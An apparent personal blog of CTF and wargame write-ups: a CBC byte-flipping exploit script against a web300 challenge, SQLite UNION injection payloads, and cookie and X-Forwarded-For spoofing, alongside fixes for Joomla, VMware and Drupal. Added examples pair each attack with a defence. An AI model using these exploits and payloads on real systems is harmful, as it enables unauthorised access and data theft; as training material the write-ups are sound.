Monday, September 9, 2013

ctf.wargame.vn web300

After reading the good article cbc-byte-flipping-attack-101-approach, I remembered that the last CTF challenge I did, web300 hosted at wargame.vn, also used this technique to get the flag.
http://challenges.wargame.vn:1337/web300_c4d7c1d9c925b4021adf5e192315ecb9

After posting a secret to the server we get some useful things:
link:
/?file=362e10cd887022a369c60c3961edf89eaeadfde998a4c6d9794c9e99316c44a39b73b02e3fa2e75820706609e2549ad9bf6a32ce42737fe212e6fa6a91f6fd21&sign=56eb7a1a95ef06c35c6a942e7da55462
filename: 5ac30b7bd737fc5c04d739a61d9f47f0

With the hint we get the source code. Below are the important parts:
function strToHex($string)
{
    $hex='';
    for ($i=0; $i < strlen($string); $i++){
        $tmp = dechex(ord($string[$i]));
        $hex .= (strlen($tmp)==1)?"0".$tmp:$tmp;
    }
    return $hex;
}
function hexToStr($hex)
{
    $string='';
    for ($i=0; $i < strlen($hex)-1; $i+=2)
        $string .= chr(hexdec($hex[$i].$hex[$i+1]));
    return $string;
}
//
// encrypt + decrypt AES
//
include("init.php"); // define _KEY,_IV,_SECRET
// flag in ./secret/flag.php

function encrypt_($str){
    return strToHex(mcrypt_encrypt(MCRYPT_RIJNDAEL_128, _KEY, $str, MCRYPT_MODE_CBC,_IV));
}
function decrypt_($str){
    return rtrim(mcrypt_decrypt(MCRYPT_RIJNDAEL_128, _KEY, hexToStr($str), MCRYPT_MODE_CBC,_IV),"\0");
}
function hmac_($msg,$secret){
    return hash_hmac('md5',$msg,$secret);
}

if(!empty($_POST['secret']) && is_string($_POST['secret']) && strlen($_POST['secret']) < 1337){
    $secret_hmac = md5(_SECRET.rand(0,1337),true);
    $secret_filename = md5(session_id.$secret_hmac);
    file_put_contents("./secret/".$secret_filename,$_POST['secret']);
    $secret_link = encrypt_($secret_filename."|".$secret_hmac);
    echo "<br /><a class='button button-blue' href='?file={$secret_link}&sign=".hmac_($secret_filename,$secret_hmac)."'>Your secret</a>";
}elseif(!empty($_GET['file'])){
    $decrypt = explode("|",decrypt_($_GET['file']));
    $secret_filename = $decrypt[0];
    $secret_hmac = $decrypt[1];
    $hmac_ = $_GET['sign'];
    $error = false;
    if(strlen($secret_hmac) != 16){
        echo "HMAC: Bad length! (".strlen($secret_hmac).")\n";
        $error = true;
    }
    if(hmac_($secret_filename,$secret_hmac)!==$hmac_){
        echo "HMAC: Not match!\n";
        $error = true;
    }
?>
    <!-- the decrypted filename is echoed here whether or not the checks above passed -->
    <blockquote class="curly-quotes" cite="./secret/<?=$secret_filename?>">
        <?php
            if(!$error)
                echo file_get_contents("./secret/".basename($secret_filename)); // anti directory traversal
            else
                echo "ERROR!";
        ?>
    </blockquote>
<?php
}else{
?>

By observing that code, we see that:
- the flag is in ./secret/flag.php
- the filename is generated randomly and, after decryption, is echoed into <blockquote class="curly-quotes" cite="./secret/<?=$secret_filename?>"> whether or not the HMAC checks pass
- the link is AES-128 in CBC mode with no integrity check on the ciphertext itself, so it can be tampered with using the byte-flipping technique
- the filename and the hmac are separated by a "|" character

First, we need to make the server open the flag file, so the decrypted filename should end in /flag.php. Luckily, because basename() is applied to it, the filename can be anything as long as it ends with /flag.php (the result is always flag.php). We know the generated filename is 32 bytes long and AES-128 works on 16-byte blocks, so the filename fills exactly the first two plaintext blocks and we only have to change its last 9 bytes (len("/flag.php") = 9). In CBC each decrypted block is XORed with the previous ciphertext block, so flipping bytes 7..15 of the first ciphertext block rewrites bytes 7..15 of the second plaintext block; the first block then decrypts to garbage, but basename() discards that part anyway.

import re
import hmac
import hashlib
import urllib2

base = "http://challenges.wargame.vn:1337/web300_c4d7c1d9c925b4021adf5e192315ecb9/"

def request(url):
    # helper the write-up left out: the decrypted filename is echoed in the
    # blockquote's cite="./secret/..." attribute even when the HMAC checks fail
    # (the raw hmac bytes are echoed unescaped, so this regex is a little fragile)
    html = urllib2.urlopen(url).read()
    return re.search(r'cite="\./secret/(.*?)">', html, re.S).group(1)

def getflag(url):
    # helper the write-up left out: the file contents are printed inside the blockquote
    html = urllib2.urlopen(url).read()
    return re.search(r'<blockquote[^>]*>(.*?)</blockquote>', html, re.S).group(1).strip()

fake_filename = "/flag.php"
true_filename = '5ac30b7bd737fc5c04d739a61d9f47f0'

file = '362e10cd887022a369c60c3961edf89eaeadfde998a4c6d9794c9e99316c44a39b73b02e3fa2e75820706609e2549ad9bf6a32ce42737fe212e6fa6a91f6fd21'
file = file.decode('hex')    # Python 2: 64 raw bytes = 4 AES blocks

sign = "56eb7a1a95ef06c35c6a942e7da55462"

# we only need to change the last 9 bytes of the second 16-byte block, so we XOR
# bytes 7..15 of the FIRST ciphertext block (which then decrypts to garbage)
fakefile = file[:7]
for i in range(7, 16):
    fakefile += chr(ord(file[i]) ^ ord(fake_filename[i-7]) ^ ord(true_filename[16+i]))
fakefile += file[16:]

# now we have the fake filename; request it to check that the server decrypts it the way
# we expect (garbage block + "04d739a/flag.php") and keep that string for the sign later
url = base + "?file=" + fakefile.encode('hex') + "&sign=" + sign
dec_fake_filename = request(url)

From here on we have a fake filename, but we still cannot get the flag because of
    if(hmac_($secret_filename,$secret_hmac)!==$hmac_)
and we do not know $secret_hmac.

Next, we know the "|" character separates the filename from the hmac (filename + "|" + hmac, with len(filename) = 32). Using the same technique, change plaintext byte 33 (index 32) from "|" to some other character, say "&": explode() then finds no separator, so the whole decrypted string, hmac included, ends up in $secret_filename and is echoed back in the cite attribute.

fakehmac = file[:16]
fakehmac += chr(ord(file[16]) ^ ord('|') ^ ord('&'))
fakehmac += file[17:]

url = base + "?file=" + fakehmac.encode('hex') + "&sign=" + sign

Now the hmac sits right at offset 33 of the echoed string:

sec_hmac = request(url)[33:]
# (if the garbage block happens to contain "|", or the hmac ends in a NUL byte that
# the server's rtrim strips, len(sec_hmac) != 16: just POST a new secret and start over)

# now we have sec_hmac => HMAC-MD5 of the decrypted fake filename with it gives a valid sign
sign = hmac.new(sec_hmac, dec_fake_filename, hashlib.md5).hexdigest()

url = base + "?file=" + fakefile.encode('hex') + "&sign=" + sign

print getflag(url)
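As an added example (not code from the write-up), both flips described above run end to end against a small CBC implementation, followed by the server-side fix the challenge lacked: an HMAC over the ciphertext under a key the client never learns, verified before anything is decrypted or echoed. The block cipher is a labelled stand-in for AES, and the keys and the 16-byte HMAC value are constructed; the filename is the one from the post.

```python
import hmac, hashlib
BLOCK = 16
# Stand-in for AES, NOT a real cipher: any invertible 16-byte map will do, because
# CBC malleability comes from the XOR chaining, not from the block cipher.
def _enc_block(key, blk):
    return bytes(((b ^ k) + i) & 0xFF for i, (b, k) in enumerate(zip(blk, key)))[::-1]
def _dec_block(key, blk):
    return bytes(((b - i) & 0xFF) ^ k for i, (b, k) in enumerate(zip(blk[::-1], key)))

def cbc_encrypt(key, iv, pt):
    pt += b"\0" * (-len(pt) % BLOCK)            # zero padding, like mcrypt
    out, prev = b"", iv
    for i in range(0, len(pt), BLOCK):
        prev = _enc_block(key, bytes(a ^ b for a, b in zip(pt[i:i + BLOCK], prev)))
        out += prev
    return out

def cbc_decrypt(key, iv, ct):
    out, prev = b"", iv
    for i in range(0, len(ct), BLOCK):
        out += bytes(a ^ b for a, b in zip(_dec_block(key, ct[i:i + BLOCK]), prev))
        prev = ct[i:i + BLOCK]
    return out.rstrip(b"\0")                    # rtrim(..., "\0") as in decrypt_()

def flip(ct, pos, old, new):
    """Make plaintext byte pos (>= 16) decrypt to new instead of old by XORing the
    ciphertext byte one block earlier; that earlier block then decrypts to garbage."""
    i = pos - BLOCK
    return ct[:i] + bytes([ct[i] ^ old ^ new]) + ct[i + 1:]

def forge(key, iv, filename, secret_hmac):
    # The two flips from the write-up: tail -> "/flag.php", then "|" -> "&".
    token = cbc_encrypt(key, iv, filename + b"|" + secret_hmac)
    fakefile = token
    for j, ch in enumerate(b"/flag.php"):           # plaintext bytes 23..31
        fakefile = flip(fakefile, 23 + j, filename[23 + j], ch)
    fakehmac = flip(token, 32, ord("|"), ord("&"))   # whole string lands in $decrypt[0]
    return cbc_decrypt(key, iv, fakefile)[16:32], cbc_decrypt(key, iv, fakehmac)[33:49]

# The fix the challenge lacked: MAC the ciphertext with a key the client never
# learns, and verify it before decrypting or echoing anything (encrypt-then-MAC).
def seal(mac_key, key, iv, pt):
    ct = cbc_encrypt(key, iv, pt)
    return ct + hmac.new(mac_key, ct, hashlib.sha256).digest()
def open_sealed(mac_key, key, iv, blob):
    ct, tag = blob[:-32], blob[-32:]
    if not hmac.compare_digest(tag, hmac.new(mac_key, ct, hashlib.sha256).digest()):
        return None                                  # tampered: reject, decrypt nothing
    return cbc_decrypt(key, iv, ct)
```

With the sealed form, either flip changes the ciphertext and therefore the tag, so the server rejects the token before the decrypted filename ever reaches the cite attribute.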

shl

To perform shl eax,cl in Python: x86 masks the shift count to its low 5 bits (so a count of 32 shifts by 0, not by 32), and eax only keeps the low 32 bits of the result.

def shl_eax_cl(eax, cl):
    cl &= 31                          # shl eax,cl uses the count modulo 32
    return (eax << cl) & 0xFFFFFFFF   # truncate to the 32-bit register


Wednesday, August 14, 2013

ctf.wargame.vn web200

url: http://challenges.wargame.vn:1337/web200_3b3b44938292fda6efa33655c0954123/

Monday, August 12, 2013

ctf.wargame.vn 2013 web150

url:http://42.117.7.116/web150_be56cb18b29a7b9dba9497d46e58ca83/
Hint:
Hint 1: ~~:>
Hint 2: Get index.php source !
Hint 3: Go home #mysql, you're drunk

ctf.wargame.vn 2013 web100

URL:
http://challenges.wargame.vn:1337/web100_f977a5eaea38b2dcd992c112bdb84b9a/

Hint:
Hint 1: Real-world exploit ;) it's easy , it's not about SQLi ..
Hint 2: We will check your feedback! Please wait few minutes :)

ctf.wargame.vn MISC200

URL:http://challenges.wargame.vn:1337/misc200_7c51d1b6cabdef3792760bc340f868ba/
challenge hint: Mario has just invented a Web Browser program ;). This is a demo; if you're interested, send *coin* to root@wargame.vn ;)

Tuesday, August 6, 2013

ebctf 2013 - Bin200

To begin with, this challenge is very exciting and tricky. I've learnt a lot from it.
Here is the link:
http://ebctf.nl/challenges/BIN200
Here is the file:
http://ebctf.nl/files/fcb920470457ec583006ca1de1025e17/ebCTF_BIN200.exe


Saturday, July 27, 2013

ctf.wargame.vn teaser round web100

This challenge is also quite simple, but it needs you to pay attention to what the server sends to and receives from your browser.
The hint the host gave us is:
there are 7 levels :) + levels 6-7 use SQLite

Level 7: You have to guess what the query is :). Try %29 %22
Other levels: look into PHP and Apache :).

In this challenge I use only a web browser (Firefox or Iceweasel) with some add-ons, and Burp Suite to modify requests before they are sent.
Let's start with the link:
http://challenges.wargame.vn:1337/web100_d6da263d82cd07bd02cecf82f2b666b7/

It works!..

Basically, the website seems incomplete. Open the page source: nothing special, except that there is a vertical scroll bar. Scroll all the way to the bottom, and the level 2 link is hidden there. This one is always a trick that catches some players.

Let's continue to level 2 with the link from the previous level.

You're not logged in!

wtf, why aren't we logged in? There is no form for us to authenticate with, so there must be another way to make the server believe we are logged in. One way is a cookie: we need to send a cookie that tells the server we are already logged in. Cookie Manager, a Firefox add-on, shows nothing; no cookie is stored yet. Next, let's check what the server sends us using Live HTTP Headers, another Firefox add-on. (Thanks ML for this hint; with my little CTF experience I didn't even think of examining what the server sends.)

Set-Cookie: login=0; expires=Thu, 01-Jan-1970 00:00:01 GMT

That explains why no cookie is stored in our browser. The job is easy now: set the login cookie to 1 in our request to the server and get the next level link.

In level 3 we do the same as in level 2, except that instead of login the cookie has to be set to an IP address that is hidden in this level's page source.

Level 4 is more of a challenge than the first 3 levels. Open the page source and we get an array of server variables and a hidden variable.

I guessed that to pass this level we need to set the server variable HTTP_1337 to 1337.
To do this you need to understand what a server variable is and how it is built from the request (http://www.php.net/manual/en/reserved.variables.server.php): PHP exposes each request header as $_SERVER['HTTP_<NAME>'], so insert the following line into the request's HTTP headers before it is sent to the server:
1337:1337

Level 5 is the same idea as level 4. We need to change our IP address ($_SERVER['REMOTE_ADDR']) to 127.0.0.1, which seems impossible. Just use Google and you find something interesting: http://en.wikipedia.org/wiki/X-Forwarded-For

Move on to the next level. This one is no longer a PHP trick; it needs SQL injection.
?id=1
Hello manhluat!

Change the value to see whether it is injectable.
?id=1'
Nothing ...

So it may be injectable. Do some more SQLi:
id=-1 union select 1,1,1;--
Hello 1!

It works! Now it is time to exploit this level. We know it uses SQLite, so the following query lists the table names:
?id=-1 union select 1,name,1 from sqlite_master WHERE type='table' ;--

Hello users!

We get the table users.

?id=-1 union select 1,username,1 from users ;--
Hello admin!

?id=-1 union select 1,password,1 from users where username='admin';--
Hello ....(level7 link)!

Following the link, we reach level 7. Here the host's hint about %29 and %22, the ) and " characters, comes in.


?id=-1
Hello!
?id=-1"
Nothing... -> there must be an error in the SQL query
?id=-1")
Nothing...
?id=-1");--
Hello!

Ok, now we guess the query should be: select ... from ... where (id="xxx")

Let's try some more:
?id=-1") union select 1,1,1 where ("1"="1
Hello 1!

Ok. Now we know how to pass this level. Do the same as in the previous level.
?id=-1") union select 1,name,1 from sqlite_master where ("1"="1

Hello flag!

?id=-1") union select 1,flag,1 from flag where ("1"="1

Done.
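As an added example (not from the write-up), the level 6/7 lookup reproduced against an in-memory SQLite database, once built the way the challenge builds it and once with a bound parameter; the schema, the password and the flag are constructed, and the payloads are the ones used above.

```python
import sqlite3

def make_db():
    """Constructed stand-in for the level 6/7 database (not the challenge's real schema)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users (id INTEGER, username TEXT, password TEXT);
        CREATE TABLE flag  (id INTEGER, flag TEXT);
        INSERT INTO users VALUES (1, 'manhluat', 'constructed-password');
        INSERT INTO flag  VALUES (1, 'FLAG{constructed}');
    """)
    return db

def _render(rows):
    # The level echoes the second column of every row that comes back.
    return ["Hello %s!" % r[1] for r in rows] or ["Nothing..."]

def greet_vulnerable(db, user_id):
    """Level-7 style: ?id= is pasted straight into (id="...") without escaping."""
    sql = 'SELECT id, username, password FROM users WHERE (id="%s")' % user_id
    try:
        return _render(db.execute(sql).fetchall())
    except sqlite3.OperationalError:    # broken quoting -> the page's "Nothing..."
        return ["Nothing..."]

def greet_safe(db, user_id):
    """Same lookup with a bound parameter: the value can never leave the quotes."""
    sql = "SELECT id, username, password FROM users WHERE (id = ?)"
    return _render(db.execute(sql, (user_id,)).fetchall())

# The payload shapes from the write-up above, exactly as typed into ?id=
PROBE       = '-1"'
LIST_TABLES = '-1") union select 1,name,1 from sqlite_master where ("1"="1'
READ_FLAG   = '-1") union select 1,flag,1 from flag where ("1"="1'
```

With the bound parameter the same payloads are compared as one literal value against id, so the probe no longer breaks the query and the union never becomes part of it.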

ctf.wargame.vn teaser round web50


There are 2 links in this challenge:
  • main: http://challenges.wargame.vn:1337/web50_4e4d6c332b6fe62a63afe56171fd3725/?x=

  • source code: this looks like a mistake by the web developer, who left the temp version of the source (an editor backup file, index.php~) on the server: http://challenges.wargame.vn:1337/web50_4e4d6c332b6fe62a63afe56171fd3725/index.php~

So, firstly, just check the source code to see what this mission requires.
Open that source code link: it is a blank page. No worries, view the page source (this is the most important step in all web challenges).

<?php
error_reporting(0);
$flag = file('../../flag.txt');
if ($_GET['x']==="\x01\x03\x03\x07")
    echo $flag[0];
?>

It seems that main compares the x parameter with a string of the bytes 0x01, 0x03, 0x03 and 0x07 (hex values), so we need to feed x exactly that.
To do it we have to know how to pass raw bytes in a URL: the % (percent) symbol followed by two hex digits. For example, %20 stands for a space ( ).
Back to the main link: request ?x=%01%03%03%07 and we get the flag.

Wednesday, July 17, 2013

HTS App 16

First thought: this app should be marked as easy.
It uses the CreateProcess API to run a .bat file that is hidden in a secret place. Finding that bat file solves this application.

HTS app 12

This application is different from the others. It does not show the password or hide it somewhere; it creates the password while running.
There are 2 timers: one displays the verifying-password message and the other checks the password.
With VB Decompiler Lite you can get the address of the Timer_Timer() function. Set a breakpoint there in OllyDbg.
Look for the conditional jump that leads to the message "Possibly correct!".
When you get there (the conditional jump), search the stack for what you need. If you are not a native speaker you may need a dictionary to spot the real password (like me :P)

Joomla error Warning: Invalid argument supplied for foreach() in .../libraries/joomla/database/database/mysql.php on line 383

This error gave me a headache for a whole morning.
These warnings are displayed instead of the articles.
You can also have problems when you log in to the admin panel and cannot read some articles, categories, ...
Also, phpMyAdmin cannot get the table structure even after you repair the tables.
And you see this error when trying to save the configuration:

“The Global Configuration extension could not be found. Text filter settings have not been saved.”

The problem: the tmp directory of the MySQL server is full.
Solution: clear tmp.
Done!

HTS app13

As the hint says, to complete this application you need to rely on the execution time (a timing side channel).
- Brute-force each number over 1-999.
- Start with number 1, then number 2 and number 3.
- When you have 3 numbers, do the same with number 4; it will show you the password when all 4 numbers match.
Note: when I brute-forced the 4th number I waited forever before I realised it needed me to hit Any Key to confirm, so take care with this number.

Tuesday, July 16, 2013

HTS app11

This app is ridiculous. After reading some hints, I got it when I maximised the app.

HTS App10

This application is very easy to get the password from.
- open app10win with VB Decompiler Lite
- you will notice there are three functions but only 1 visible button, so there is a hidden one
- with OllyDbg, change the address the Command1 handler calls to that of the hidden function and you get the correct password

Monday, July 15, 2013

hackthissite application 5+6

With OllyDbg:
- search for the important strings
- trace the code and carefully examine what is stored on the stack

hackthissite application 4

What I need is OllyDbg and VB Decompiler Lite:
- open app4 with VB Decompiler Lite
- wait until it decompiles completely
- look for the addresses of Command1_click and Command1_mousemove
- attach OllyDbg to app4 and run it
- find the address of the JUMP to the Command1_mousemove function
- change it to a JUMP to the Command1_click function
- done

Saturday, July 13, 2013

realistic mission 15,16

What I've learnt today:
- read source code carefully
- extract a password-protected zip without the password using pkcrack (a known-plaintext attack)
- $$var => $($var)
- override PHP variables with POST and GET

Friday, February 22, 2013

vmware errror on fedora

Use the command below if you get the error "kernel headers version were not found" when running VMware (assuming you've installed kernel-devel):
cp /usr/include/linux/version.h /lib/modules/3.7.2-204.fc18.x86_64/build/include/linux/

Update patch for kernel 3.8.x:
http://communities.vmware.com/thread/432897

Tuesday, January 22, 2013

i18n and variable error on updating

When you update Drupal, if you get these errors:
Variable store (7.x-2.x) (incompatible with version 7.x-1.2)
Variable realm (7.x-2.x) (incompatible with version 7.x-1.2)

try removing the 2 directories i18n and variable in /site/default/modules/,
then upload the 2 older versions of i18n and variable first (i18n ver 7.x.1.5 and variable ver 7.x.1.2)
and run update.php.

If it runs successfully, upload your new i18n and variable modules (i18n ver 7.1.8 and variable ver 7.x.2.1, for example) to site/default/modules, then run update again. It should be done!